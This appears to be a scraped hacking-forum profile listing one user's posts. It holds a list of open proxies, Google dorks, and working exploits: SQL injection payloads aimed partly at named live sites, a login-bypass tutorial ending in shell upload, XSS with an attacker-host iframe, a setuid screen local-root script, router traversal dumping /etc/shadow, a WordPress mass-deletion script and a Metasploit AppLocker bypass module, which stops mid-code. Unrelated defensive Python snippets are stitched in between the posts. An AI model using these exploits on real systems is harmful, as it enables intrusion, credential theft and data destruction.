geeko

Active Members
  • Content Count: 61
  • Joined
  • Last visited

Everything posted by geeko

  1. 46.99.133.241:1080 66.58.244.108:24705 71.228.211.89:17002 45.63.90.226:6789 162.254.168.154:56499 68.7.156.247:13623 104.238.183.182:6789 67.197.149.140:18293 104.219.112.114:52862 208.104.74.191:27899 47.35.38.116:57216 108.218.207.108:30049 183.232.25.100:4080 107.151.129.249:1080 68.178.128.170:18749 45.63.82.190:6789 24.2.70.116:24182 180.92.239.217:1080 97.82.41.68:40641 45.63.88.229:6789 72.243.180.159:45554 24.196.134.76:18527 186.121.206.234:1080 67.197.28.10:43491 45.63.83.124:6789 64.126.70.72:53473 8.30.102.50:45554 76.8.208.230:45554 204.248.125.246:45554 104.207.150.81:6789 184.20.102.255:1080 66.167.193.138:22010 45.32.130.95:6789 47.208.147.42:27181 63.240.250.44:50652 67.170.49.111:29381 223.25.99.163:1180 47.222.33.206:55495 76.29.93.253:50999 73.25.253.84:25242 104.238.182.74:6789 64.121.199.87:20985 24.189.131.7:19821 208.74.33.114:10223 45.63.88.181:6789 173.208.137.46:6789 24.178.207.30:10379 75.118.153.228:10200 208.104.74.89:27677 45.32.130.120:6789 27.123.1.162:1080 216.10.224.223:45554 24.74.75.139:34070 96.237.161.130:46555 117.74.120.81:1080 74.75.164.255:10200 97.99.103.153:53293 75.151.213.85:3366 162.213.178.102:45554 68.64.229.84:45554 36.66.213.167:1080 45.63.88.187:6789 208.104.74.229:27809 47.35.79.9:46845 24.240.255.93:12666 45.32.139.243:6789 100.42.158.187:45554 75.76.230.236:45554 104.238.180.134:6789 208.104.232.210:52886 72.91.84.235:51815 209.159.251.12:56511 67.197.232.209:23864 104.238.183.133:6789 97.77.75.181:28111 73.181.120.114:59152 216.24.77.41:17382 45.32.213.237:6789 45.63.90.33:6789 45.63.89.78:6789 216.212.236.240:45554 54.215.184.209:34646 76.29.6.56:40178 73.199.232.15:30495 45.32.141.69:6789 91.195.103.172:31336 73.15.240.216:28416 76.94.99.191:63798 76.25.126.209:58399 45.63.84.133:6789 24.16.89.71:38784 45.32.130.189:6789 45.32.137.112:6789 68.117.143.146:17472 68.81.198.11:21645 45.32.128.60:6789 190.129.1.141:46690 175.143.94.161:10233 123.207.167.125:1080 67.197.251.54:20191 104.244.223.85:24950 
24.72.213.167:45554 174.141.178.158:45554 63.142.208.138:14803 45.32.141.196:6789 24.93.138.78:10200 104.241.13.16:10200 208.104.74.50:27766 67.197.236.88:22961 45.55.28.39:21532 104.220.172.192:14811 70.99.133.238:15466 72.47.70.110:55446 104.244.140.93:45554 73.13.150.205:12327 208.111.120.173:10200 67.197.29.170:43075 68.225.192.228:21202 73.59.46.201:45554 103.195.142.88:9999 173.26.244.42:36839 67.197.253.126:18583 67.197.232.59:24018 64.4.99.16:62915 67.197.29.186:43091 180.178.104.178:1080 45.55.28.39:24609 66.110.216.105:39431 64.184.5.7:45554 68.198.171.167:29702 104.219.112.98:16329 24.249.92.200:45554 45.63.94.22:6789 45.63.85.71:6789 45.32.136.150:6789 70.234.238.97:8088 45.63.93.251:6789 96.27.214.206:45554 64.185.49.177:45554 115.133.125.17:55363 45.63.91.180:6789 47.88.77.171:1080 67.197.252.158:18807 67.50.240.12:26089 104.238.180.191:6789
  2. Dork: intext:"Powered by ENS Consultants"

     Exploit Title: ENS Consultants Bypass Login Vulnerability
     Google Dork: intext:"Powered by ENS Consultants"
     Tested on: Paroot

     Tutorial:
     Search the dork or go to the vendor homepage and select your target.
     Then go to the admin panel at: /admin/login.php
     Open the NoRedirect add-on and click "Add".
     Paste the target with the ^ character: ^Target
     Finally, change the URL to: site/admin/index.php
     Upload your shell and enjoy!
  3. # Exploit Title: Joomla! Component Abstract v2.1 - SQL Injection
     # Google Dork: inurl:index.php?option=com_abstract
     # Date: 02.03.2017
     # Vendor Homepage: http://joomla6teen.com/
     # Software: https://extensions.joomla.org/extensions/extension/calendars-a-events/events/abstract-manager/
     # Demo: http://demo.joomla6teen.com/abstractmanager
     # Version: 2.1
     # Tested on: Win7 x64, Kali Linux x64
     #
     # SQL Injection/Exploit:
     # http://localhost/[PATH]/index.php?option=com_abstract&view=conferences&layout=detail&pid=
     # http://localhost/[PATH]/index.php?option=com_abstract&view=conferences&task=contactEmail&pid=[SQL]
     # 1+OR+1+GROUP+BY+CONCAT_WS(0x3a,0x496873616e53656e63616e,VERSION(),FLOOR(RAND(0)*2))+HAVING+MIN(0)+OR+1
  4. The passfile you're looking for is actually a wordlist... or password list... you can make one yourself without stress, depending on the countries you want to scan, or if you want to go random you can use something generic, which you can find with a single Google search.
  5. [+] Credits: John Page AKA hyp3rlinx
     [+] Website: hyp3rlinx.altervista.org
     [+] Source: http://hyp3rlinx.altervista.org/advisories/PHPSHELL-v2.4-CROSS-SITE-SCRIPTING.txt
     [+] ISR: ApparitionSec

     Vendor:
     ==========
     sourceforge.net/projects/phpshell/
     phpshell.sourceforge.net/

     Product:
     =============
     PHPShell v2.4

     Vulnerability Type:
     ====================
     Cross Site Scripting

     CVE Reference:
     ==============
     N/A

     Security Issue:
     ================
     Multiple cross site scripting entry points exist in PHPShell, undermining the integrity between the user's browser and the server and allowing remote attackers to bypass access controls such as the same-origin policy if an authenticated user clicks an attacker-supplied link.

     The XSS issue is made possible because PHPShell calls print $_SERVER['PHP_SELF'] on the main HTML form. Since PHP_SELF references the URL, PHPShell simply reads our XSS payload from the URL and echoes it back to the client.

     <form name="shell" enctype="multipart/form-data" action="<?php print($_SERVER['PHP_SELF']) ?>" method="post">

     Since PHPShell's purpose is to execute system commands, this XSS vulnerability can potentially become a 'Remote Command Execution' vulnerability. Moreover, this XSS issue can also potentially leverage a Session Fixation vulnerability also present in PHPShell.

     Reference: http://hyp3rlinx.altervista.org/advisories/PHPSHELL-v2.4-SESSION-FIXATION.txt

     Tested successfully in Firefox

     Exploit/POC:
     =============

     XSS 1)
     http://VICTIM-IP/phpshell-2.4/phpshell.php/%22/%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

     OR inject an IFRAME to phish and steal credentials, you get the idea.

     http://VICTIM-IP/phpshell-2.4/phpshell.php/%22/%3E%3Cscript%3Evar%20frm=document.createElement('IFRAME');document.body.appendChild(frm);frm.setAttribute(%22width%22,%22900%22);frm.setAttribute(%22height%22,%22900%22);frm.src=%22http://ATTACKER-IP.com%22%3C/script%3E%3C!--

     XSS 2)
     http://VICTIM-IP/phpshell-2.4/phpshell.php

     On the Login Authentication HTML form, in the 'username' input field enter:
     " onMousemove="alert(document.cookie)
     then enter a password and hit Enter.

     Network Access:
     ===============
     Remote

     Severity:
     =========
     Medium

     Disclosure Timeline:
     ===============================
     Vendor Notification: No reply
     In addition, the INSTALL file "Bugs? Comments?" Tracker System link is HTTP 404:
     http://sourceforge.net/tracker/?group_id=156638
     February 18, 2017 : Public Disclosure
  6. Cisco ASA: Buffer overflows in WebVPN cifs handling
     CVE-2017-3807

     The WebVPN http server exposes a way of accessing files from CIFS with a url hook of the form:
     https://portal/+webvpn+/CIFS_R/share_server/share_name/file

     When someone logged into the portal navigates to such an address, the http_cifs_process_path function parses the request URI and creates 2 C strings in a http_cifs_context struct:

     http_cifs_context:
       +0x160 char* file_dir
       +0x168 char* file_name

     These strings are copied in various places, but this is done incorrectly. For example, in ewaURLHookCifs, there is the following pseudocode:

```c
filename_copy_buf = calloc(1LL, 336LL);
net_handle[10] = filename_copy_buf;
if ( filename_copy_buf )
{
  src_len = _wrap_strlen(filename_from_request);
  if ( filename_from_request[src_len - 1] == ('|') )
  {
    // wrong length (src length)
    strncpy((char *)filename_copy_buf, filename_from_request, src_len - 1);
  }
```

     In this case, a fixed size buf (|filename_copy_buf|) is allocated. Later, strncpy is called to copy to it, but the length passed is the length of the src string, which can be larger than 366 bytes. This leads to heap overflow.

     There appear to be various other places where the copying is done in an unsafe way:
     - http_cifs_context_to_name, which is called from ewaFile{Read,Write,Get}Cifs and ewaFilePost, uses strcat to copy the file path and file name to a fixed size (stack) buffer.
     - http_cifs_pre_fopen, which has a similar issue with passing the length of the src buffer to strncpy.
     - Possibly http_add_query_str_from_context.
     There are probably others that I missed.

     Note that triggering this bug requires logging in to the WebVPN portal first, but the cifs share does not need to exist.

     Repro: Login to the WebVPN portal, navigate to:
     https://portal/+webvpn+/CIFS_R/server/name/ followed by 500 'A's.
     ("server" and "name" may be passed verbatim)

     *** Error in `lina': malloc(): memory corruption: 0x00007fa40c53f570 ***
     ======= Backtrace: =========
     /lib64/libc.so.6(+0x3f0486e74f)[0x7fa4139fc74f]
     /lib64/libc.so.6(+0x3f048783ee)[0x7fa413a063ee]
     /lib64/libc.so.6(+0x3f0487be99)[0x7fa413a09e99]
     /lib64/libc.so.6(__libc_malloc+0x60)[0x7fa413a0b5a0]
     lina(+0x321976a)[0x7fa41a2b276a]
     lina(mem_mh_calloc+0x123)[0x7fa41a2b4c83]
     lina(resMgrCalloc+0x100)[0x7fa419659410]
     lina(calloc+0x94)[0x7fa419589a34]
     lina(ewsFileSetupFilesystemDoc+0x28)[0x7fa41826a608]
     lina(ewsServeFindDocument+0x142)[0x7fa418278192]
     lina(ewsServeStart+0x114)[0x7fa4182784a4]
     lina(ewsParse+0x19a0)[0x7fa418272cc0]
     lina(ewsRun+0x9c)[0x7fa41826955c]
     lina(emweb_th+0x6ab)[0x7fa418286aeb]
     lina(+0xde58ab)[0x7fa417e7e8ab]

     This was tested on 9.6(2).

     This bug is subject to a 90 day disclosure deadline. If 90 days elapse without a broadly available patch, then the bug report will automatically become visible to the public.
  7. [+] Website: hyp3rlinx.altervista.org
     [+] Source: http://hyp3rlinx.altervista.org/advisories/SAWMILL-PASS-THE-HASH-AUTHENTICATION-BYPASS.txt
     [+] ISR: ApparitionSec

     Vendor:
     ===============
     www.sawmill.net

     Product:
     ========================
     Sawmill Enterprise v8.7.9
     sawmill8.7.9.4_x86_windows.exe hash: b7ec7bc98c42c4908dfc50450b4521d0

     Sawmill is a powerful hierarchical log analysis tool that runs on every major platform.

     Vulnerability Type:
     ===================================
     Pass the Hash Authentication Bypass

     CVE Reference:
     ==============
     CVE-2017-5496

     Security Issue:
     =====================
     Sawmill suffers from a classic "Pass The Hash" vulnerability whereby an attacker who gains access to the hashed user account passwords can login to the Sawmill interface using the raw MD5 hash values, allowing attackers to bypass the work of offline cracking account password hashes.

     This issue is usually known to affect Windows systems, e.g. (NT Pass the Hash/Securityfocus, 1997). However, this vulnerability can also present itself in a vulnerable Web application.

     Sawmill account password hashes are stored under the LogAnalysisInfo/ directory in "users.cfg", e.g.

     users = {
       root_admin = {
         username = "admin"
         password_checksum = "e99a18c428cb38d5f260853678922e03"
         email_address = ""

     This config file is stored local to the Sawmill application. However, if an attacker gains access to a backup of the config that is stored in some other location that is then compromised, it can lead to subversion of Sawmill's authentication process.

     Moreover, since the 'users.cfg' file is world readable, a regular non-Admin Windows user who logs into the system running Sawmill can now grab a password hash and easily login to the vulnerable application without needing the password itself.

     How to test?
     Sawmill running (default port 8988), log off Windows and switch to a "Standard" Windows non-Administrator user.

     1) Open "users.cfg" under Sawmill's directory "C:\Program Files\Sawmill 8\LogAnalysisInfo" and copy the root_admin Admin password hash.
     2) Go to the Sawmill login page in a web browser http://VICTIM-IP:8988/, enter username 'admin' and the hash. Tada! You're Admin.

     Finally, Sawmill passwords are hashed using the vulnerable MD5 algorithm and no salt, e.g.
     password: abc123
     MD5 hash: e99a18c428cb38d5f260853678922e03

     Disclosure Timeline:
     =====================================
     Vendor Notification: January 7, 2017
     CVE-2017-5496 assigned : January 20
     Request status : January 26
     Vendor: Fix avail later in year still no ETA
     Inform vendor public disclose date
     February 18, 2017 : Public Disclosure

     Network Access:
     ===============
     Remote

     Impact:
     ======================
     Information Disclosure
     Privilege Escalation

     Severity Level:
     ================
     High

     [+] Disclaimer
     The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere.
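The two halves of the advisory above, shown as an added Python example (not Sawmill's code): `extract_checksums` lifts the hash out of a users.cfg-shaped text constructed from the excerpt, `vulnerable_login` is a hypothetical reconstruction of a check that accepts the stored checksum as a credential (the browser hashes the password and the server compares what it receives against the file), and `make_record`/`safe_login` are the fix: a salted, slow KDF run server-side over whatever the client sends, compared in constant time, so a leaked record is no longer a usable credential.

```python
import hashlib
import hmac
import os
import re

# Constructed users.cfg excerpt in the shape shown in the advisory (password 'abc123').
SAMPLE_USERS_CFG = '''users = {
  root_admin = {
    username = "admin"
    password_checksum = "e99a18c428cb38d5f260853678922e03"
    email_address = ""
  }
}
'''
PASSWORD_CHECKSUM = hashlib.md5(b"abc123").hexdigest()  # the same unsalted MD5 as the file


def extract_checksums(cfg_text: str) -> list:
    """Step 1 of the attack: pull (username, checksum) pairs straight out of the config."""
    pattern = re.compile(r'username\s*=\s*"([^"]*)"\s*password_checksum\s*=\s*"([0-9a-f]{32})"')
    return pattern.findall(cfg_text)


def client_submit(password: str) -> str:
    """What the legitimate login form sends: the unsalted MD5 of the typed password."""
    return hashlib.md5(password.encode()).hexdigest()


def vulnerable_login(submitted: str, password_checksum: str) -> bool:
    """Hypothetical reconstruction of a pass-the-hash-prone check (assumed, not Sawmill's code).

    The server compares the value it receives with the stored checksum, so anyone
    holding users.cfg can submit the checksum itself and skip the password entirely.
    """
    return hmac.compare_digest(submitted.encode(), password_checksum.encode())


def make_record(password: str, iterations: int = 200_000) -> dict:
    """Fixed storage: per-user random salt plus a deliberately slow PBKDF2-HMAC-SHA256."""
    salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return {"salt": salt.hex(), "hash": dk.hex(), "iterations": iterations}


def safe_login(submitted: str, record: dict) -> bool:
    """Fixed check: always run the KDF over the submitted value, then constant-time compare.

    Replaying the stored hash now yields PBKDF2(stored_hash), which never equals it.
    """
    dk = hashlib.pbkdf2_hmac("sha256", submitted.encode(),
                             bytes.fromhex(record["salt"]), record["iterations"])
    return hmac.compare_digest(dk, bytes.fromhex(record["hash"]))


if __name__ == "__main__":
    for user, checksum in extract_checksums(SAMPLE_USERS_CFG):
        print(f"{user}: hash accepted as password -> {vulnerable_login(checksum, checksum)}")
    rec = make_record("abc123")
    print(f"fixed: password ok -> {safe_login('abc123', rec)}, hash replay -> {safe_login(rec['hash'], rec)}")
```

The salt alone does not stop pass-the-hash; what stops it is that the server, not the client, performs the hashing step, so the stored value is never something the client is allowed to present directly.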
  8. #############################################################
     # Application Name : SQLi in Dejabú's Scripts
     # Vulnerable Type : SQL Injection
     # Google Dork: intext:Diseño de páginas web Dejabú inurl:php?id=
     # Author: fl3xpl0it a.k.a KurokoTetsuya
     # Date: 20.02.2017
     # Tested On Demo Sites:
     [+] http://www.cepaproduccion.com/content/news.php?id=1114'
     [+] http://www.cedeal.org/content/publicaciones.php?id=34'&pagina=2
     # Warning: If you don't find SQLi, try SQLi on another parameter.
     # Example: http://www.target.com/vuln.php?cat=54&id=61' (No SQLi)
     # Example: http://www.target.com/vuln.php?cat=54'&id=61 (SQLi Detected)
     #############################################################
  9. # Exploit Title: Polycom VVX Web Interface - Change Admin Password as User
     # Date: January 26, 2017
     # Exploit Author: Mike Brown
     # Vendor Homepage: http://www.polycom.com/
     # Software Link: http://downloads.polycom.com/voice/voip/uc_sw_releases_matrix.html
     # Version: Polycom vvx 410 UC Software Version: 5.3.1.0436
     # CVE : N/A
     #
     # This module requires the user to have access to the "User" account (Default User:123) in the Polycom VoIP phone's web interface.
     # The user can use the following steps to escalate privileges and become the Admin user to reveal menu items, internal IP addresses
     # and account information.

     1. Login with the "User" Account.
     2. Navigate to Settings > Change Password.
     3. Fill in "Old Password" with the current "User" password.
     4. Fill in "New Password" with the new "Admin" account password, and confirm.
     5. Using a live HTML editor, inspect the old password field. You will see:

        <input id="olduserpswd" name="122" isrebootrequired="false" helpid="525" value="" paramname="device.auth.localUserPassword" default="" config="????" variabletype="string" min="0" max="32" maxlength="32" hintdivid="userAccountConf.htm_1" type="password">

     6. Change the name field to "120".
     7. Click "Save".
     8. An error will be shown on screen, but you can now log into the Admin account with the new password.
  10. screenroot.sh - setuid screen v4.5.0 local root exploit (abuses ld.so.preload overwriting to get root):

```bash
#!/bin/bash
# screenroot.sh
# setuid screen v4.5.0 local root exploit
# abuses ld.so.preload overwriting to get root.
# bug: https://lists.gnu.org/archive/html/screen-devel/2017-01/msg00025.html
# HACK THE PLANET
# ~ infodox (25/1/2017)
echo "~ gnu/screenroot ~"
echo "[+] First, we create our shell and library..."
# constructor runs inside every process that loads /etc/ld.so.preload,
# including the root-owned one screen spawns, and makes /tmp/rootshell setuid root
cat << EOF > /tmp/libhax.c
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
__attribute__ ((__constructor__))
void dropshell(void){
    chown("/tmp/rootshell", 0, 0);
    chmod("/tmp/rootshell", 04755);
    unlink("/etc/ld.so.preload");
    printf("[+] done!\n");
}
EOF
gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c
rm -f /tmp/libhax.c
cat << EOF > /tmp/rootshell.c
#include <stdio.h>
#include <unistd.h>
int main(void){
    setuid(0);
    setgid(0);
    seteuid(0);
    setegid(0);
    /* the original called execvp("/bin/sh", NULL, NULL), which only compiles
       without a prototype in scope; this is the same exec with a proper argv */
    char *argv[] = { "/bin/sh", NULL };
    execvp("/bin/sh", argv);
}
EOF
gcc -o /tmp/rootshell /tmp/rootshell.c
rm -f /tmp/rootshell.c
echo "[+] Now we create our /etc/ld.so.preload file..."
cd /etc
umask 000 # because
# setuid screen writes the logfile as root; "-L ld.so.preload" names the file, the echo supplies the content
screen -D -m -L ld.so.preload echo -ne "\x0a/tmp/libhax.so" # newline needed
echo "[+] Triggering..."
screen -ls # screen itself is setuid, so...
/tmp/rootshell
```
  11. # Exploit Title: TM RG4332 Wireless Router Traversal Arbitrary File Read
      # Date: 27/01/2017
      # Exploit Author: Saeid Atabaki
      # Version: RG4332_V2.7.0
      # Tested on: RG4332 with mini_http 1.19

      = 1 =============================================================

```http
GET /cgi-bin/webproc?getpage=html/../../../etc/passwd&var:menu=status&var:page=system_msg HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Cookie: sessionid=17746062; auth=ok; expires=Sun, 15-May-2012 01:45:46 GMT; language=en_us; Lan_IPAddress=192.168.0.1; sys_UserName=admin; expires=Mon, 31-Jan-2050 16:00:00 GMT
Connection: close
```

      ---

```http
HTTP/1.0 200 OK
Content-type: text/html
Cache-Control: no-cache
set-cookie: sessionid=17746062;
set-cookie: auth=ok;
set-cookie: expires=Sun, 15-May-2012 01:45:46 GMT;

#root:x:0:0:root:/root:/bin/bash
root:x:0:0:root:/root:/bin/sh
#tw:x:504:504::/home/tw:/bin/bash
#tw:x:504:504::/home/tw:/bin/msh
```

      = 2 =============================================================

```http
GET /cgi-bin/webproc?getpage=html/../../../etc/shadow&var:menu=status&var:page=system_msg HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Cookie: sessionid=17746062; auth=ok; expires=Sun, 15-May-2012 01:45:46 GMT; language=en_us; Lan_IPAddress=192.168.0.1; sys_UserName=admin; expires=Mon, 31-Jan-2050 16:00:00 GMT
Connection: close
```

      ---

```http
HTTP/1.0 200 OK
Content-type: text/html
Cache-Control: no-cache
set-cookie: sessionid=17746062;
set-cookie: auth=ok;
set-cookie: expires=Sun, 15-May-2012 01:45:46 GMT;

#root:$1$BOYmzSKq$ePjEPSpkQGeBcZjlEeLqI.:13796:0:99999:7:::
root:$1$BOYmzSKq$ePjEPSpkQGeBcZjlEeLqI.:13796:0:99999:7:::
#tw:$1$zxEm2v6Q$qEbPfojsrrE/YkzqRm7qV/:13796:0:99999:7:::
#tw:$1$zxEm2v6Q$qEbPfojsrrE/YkzqRm7qV/:13796:0:99999:7:::
```
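The traversal above in miniature, as an added Python example that is not part of the advisory or the router firmware: `getpage_param` pulls the decoded `getpage` value out of a request line the way the CGI layer would, `vulnerable_resolve` is the join-and-open behaviour the two requests demonstrate, and `safe_resolve` is the check a fixed handler needs (normalise, then require the result to stay under the document root). The document root `/var/www` and the benign page `html/status.htm` are assumptions; the request lines are constructed after the ones in the post.

```python
import posixpath
from urllib.parse import parse_qs, urlsplit

# Constructed request lines modelled on the advisory (the third is the same
# traversal with percent-encoded dots, which the CGI decodes before use).
REQUESTS = [
    "GET /cgi-bin/webproc?getpage=html/../../../etc/passwd&var:menu=status&var:page=system_msg HTTP/1.1",
    "GET /cgi-bin/webproc?getpage=html/status.htm&var:menu=status HTTP/1.1",
    "GET /cgi-bin/webproc?getpage=html/%2e%2e/%2e%2e/%2e%2e/etc/shadow HTTP/1.1",
]


def getpage_param(request_line: str) -> str:
    """Return the getpage value as the CGI sees it (parse_qs percent-decodes once)."""
    target = request_line.split(" ")[1]
    return parse_qs(urlsplit(target).query).get("getpage", [""])[0]


def vulnerable_resolve(web_root: str, getpage: str) -> str:
    """What the advisory shows the router doing: join and open, so '..' walks out of the root."""
    return posixpath.normpath(posixpath.join(web_root, getpage))


def safe_resolve(web_root: str, getpage: str):
    """Resolve under the document root; return None (reject) for anything that escapes it."""
    root = posixpath.normpath(web_root)
    if "\x00" in getpage or posixpath.isabs(getpage):
        return None
    candidate = posixpath.normpath(posixpath.join(root, getpage))
    prefix = root if root.endswith("/") else root + "/"
    if candidate != root and not candidate.startswith(prefix):
        return None
    return candidate


def triage(web_root: str, request_lines: list) -> list:
    """For each request: (getpage, path the router would open, path a fixed handler would serve)."""
    rows = []
    for line in request_lines:
        page = getpage_param(line)
        rows.append((page, vulnerable_resolve(web_root, page), safe_resolve(web_root, page)))
    return rows


if __name__ == "__main__":
    for page, bad, good in triage("/var/www", REQUESTS):
        print(f"{page!r:45} router opens {bad!r:22} fixed handler serves {good!r}")
```

On a real filesystem the fixed handler should additionally `os.path.realpath()` the candidate before the prefix check, so a symlink inside the document root cannot re-open the same escape.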
  12. * Exploit Title: Bulk Delete [Privilege Escalation]
      * Discovery Date: 2016-02-10
      * Exploit Author: Panagiotis Vagenas
      * Author Link: https://twitter.com/panVagenas
      * Vendor Homepage: http://bulkwp.com/
      * Software Link: https://wordpress.org/plugins/bulk-delete/
      * Version: 5.5.3
      * Tested on: WordPress 4.4.2
      * Category: WebApps, WordPress

      Description
      -----------

      _Bulk Delete_ plugin for WordPress suffers from a privilege escalation vulnerability. Any registered user can exploit the lack of capabilities checks to perform all administrative tasks provided by the _Bulk Delete_ plugin. Some of these actions, but not all, are:

      - `bd_delete_pages_by_status`: deletes all pages by status
      - `bd_delete_posts_by_post_type`: deletes all posts by type
      - `bd_delete_users_by_meta`: delete all users with a specific pair of meta name, meta value

      Nearly all actions registered by this plugin can be performed by any user, as long as they are passed to a query var named `bd_action` and the user has a valid account. These actions would normally require administrative rights, so we can consider this a privilege escalation vulnerability.

      PoC
      ---

      The following script will delete all pages, posts and users from the infected website.

```python
#!/usr/bin/python3
################################################################################
# Bulk Delete Privilege Escalation Exploit
#
# **IMPORTANT** Don't use this in a production site, if vulnerable it will
# delete nearly all your sites content
#
# Author: Panagiotis Vagenas <pan.vagenas@gmail.com>
################################################################################

import requests

loginUrl = 'http://example.com/wp-login.php'
adminUrl = 'http://example.com/wp-admin/index.php'

loginPostData = {
    'log': 'username',
    'pwd': 'password',
    'rememberme': 'forever',
    'wp-submit': 'Log+In'
}

# a successful login is a 302 to wp-admin carrying the auth cookies
l = requests.post(loginUrl, data=loginPostData)

if l.status_code != 200 or len(l.history) == 0 or len(l.history[0].cookies) == 0:
    print("Couldn't acquire a valid session")
    exit(1)

loggedInCookies = l.history[0].cookies


def do_action(action, data):
    # any logged-in user may trigger the plugin's admin actions via ?bd_action=
    try:
        requests.post(
            adminUrl + '?bd_action=' + action,
            data=data,
            cookies=loggedInCookies,
            timeout=30
        )
    except requests.exceptions.Timeout:  # requests raises its own Timeout, not the builtin TimeoutError
        print('Action ' + action + ' timed out')
    else:
        print('Action ' + action + ' performed')


print('Deleting all pages')
do_action(
    'delete_pages_by_status',
    {
        'smbd_pages_force_delete': 'true',
        'smbd_published_pages': 'published_pages',
        'smbd_draft_pages': 'draft_pages',
        'smbd_pending_pages': 'pending_pages',
        'smbd_future_pages': 'future_pages',
        'smbd_private_pages': 'private_pages',
    }
)

print('Deleting all posts from all default post types')
do_action('delete_posts_by_post_type', {'smbd_types[]': [
    'post',
    'page',
    'attachment',
    'revision',
    'nav_menu_item'
]})

print('Deleting all users')
do_action(
    'delete_users_by_meta',
    {
        'smbd_u_meta_key': 'nickname',
        'smbd_u_meta_compare': 'LIKE',
        'smbd_u_meta_value': '',
    }
)

exit(0)
```

      Solution
      --------

      Upgrade to v5.5.4

      Timeline
      --------

      1. **2016-02-10**: Requested CVE ID
      2. **2016-02-10**: Vendor notified through wordpress.org support forums
      3. **2016-02-10**: Vendor notified through the contact form at bulkwp.com
      4. **2016-02-10**: Vendor responded and received details about the issue
      5. **2016-02-10**: Vendor verified vulnerability
      6. **2016-02-13**: Vendor released v5.5.4 which resolves this issue

      exploit source : packetstormsecurity.com
  13. Metasploit local exploit module: AppLocker Execution Prevention Bypass (InstallUtil technique). Windows path separators lost in the copy are restored below.

```ruby
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class Metasploit4 < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Exploit::FileDropper
  include Msf::Post::File

  def initialize(info={})
    super(update_info(info,
      'Name'          => 'AppLocker Execution Prevention Bypass',
      'Description'   => %q{
        This module will generate a .NET service executable on the target and utilise
        InstallUtil to run the payload bypassing the AppLocker protection. Currently only
        the InstallUtil method is provided, but future methods can be added easily.
      },
      'License'       => MSF_LICENSE,
      'Author'        => [
        'Casey Smith', # Original AppLocker bypass research
        'OJ Reeves'    # MSF module
      ],
      'Platform'      => [ 'win' ],
      'Arch'          => [ ARCH_X86, ARCH_X86_64 ],
      'SessionTypes'  => [ 'meterpreter' ],
      'Targets'       => [ [ 'Windows', {} ] ],
      'DefaultTarget' => 0,
      'DisclosureDate'=> 'Aug 3 2015',
      'References'    => [
        ['URL', 'https://gist.github.com/subTee/fac6af078937dda81e57']
      ]
    ))

    register_options([
      OptEnum.new('TECHNIQUE', [true, 'Technique to use to bypass AppLocker', 'INSTALLUTIL', %w(INSTALLUTIL)])
    ])
  end

  # Run Method for when run command is issued
  def exploit
    if datastore['TECHNIQUE'] == 'INSTALLUTIL'
      if payload.arch.first == 'x64' && sysinfo['Architecture'] !~ /64/
        fail_with(Failure::NoTarget, 'The target platform is x86. 64-bit payloads are not supported.')
      end
    end

    # sysinfo is only on meterpreter sessions
    print_status("Running module against #{sysinfo['Computer']}") if not sysinfo.nil?

    if datastore['TECHNIQUE'] == 'INSTALLUTIL'
      execute_installutil
    end
  end

  def execute_installutil
    envs = get_envs('TEMP', 'windir')
    dotnet_path = get_dotnet_path(envs['windir'])
    print_status("Using .NET path #{dotnet_path}")

    cs_path = "#{envs['TEMP']}\\#{Rex::Text.rand_text_alpha(8)}.cs"
    exe_path = "#{envs['TEMP']}\\#{Rex::Text.rand_text_alpha(8)}.exe"
    installutil_path = "#{dotnet_path}\\InstallUtil.exe"

    print_status("Writing payload to #{cs_path}")
    write_file(cs_path, generate_csharp_source)
    register_files_for_cleanup(cs_path)

    # csc.exe is a signed Microsoft binary, so compiling on the target is allowed by AppLocker
    print_status("Compiling payload to #{exe_path}")
    csc_path = "#{dotnet_path}\\csc.exe"
    csc_platform = payload.arch.first == 'x86' ? 'x86' : 'x64'
    vprint_status("Executing: #{csc_path} /target:winexe /nologo /platform:#{csc_platform} /w:0 /out:#{exe_path} #{cs_path}")
    cmd_exec(csc_path, "/target:winexe /nologo /platform:#{csc_platform} /w:0 /out:#{exe_path} #{cs_path}")

    # InstallUtil /U runs the Uninstall() method of the Installer class without executing the exe directly
    print_status("Executing payload ...")
    vprint_status("Executing: #{installutil_path} /logfile= /LogToConsole=false /U #{exe_path}")
    client.sys.process.execute(installutil_path, "/logfile= /LogToConsole=false /U #{exe_path}", {'Hidden' => true})
    register_files_for_cleanup(exe_path)
  end

  def get_dotnet_path(windir)
    base_path = "#{windir}\\Microsoft.NET\\Framework#{payload.arch.first == 'x86' ? '' : '64'}"
    paths = dir(base_path).select {|p| p[0] == 'v'}
    dotnet_path = nil

    # newest framework version directory that actually ships InstallUtil.exe
    paths.reverse.each do |p|
      path = "#{base_path}\\#{p}"
      if directory?(path) && file?("#{path}\\InstallUtil.exe")
        dotnet_path = path
        break
      end
    end

    unless dotnet_path
      fail_with(Failure::NotVulnerable, '.NET is not present on the target.')
    end

    dotnet_path
  end

  def generate_csharp_source
    sc = payload.encoded.each_byte.map {|b| "0x#{b.to_s(16)}"}.join(',')
    cs = %Q^
    using System;
    namespace Pop {
      public class Program { public static void Main() { } }
      [System.ComponentModel.RunInstaller(true)]
      public class Pop : System.Configuration.Install.Installer {
        private static Int32 MEM_COMMIT=0x1000;
        private static IntPtr PAGE_EXECUTE_READWRITE=(IntPtr)0x40;
        private static UInt32 INFINITE = 0xFFFFFFFF;
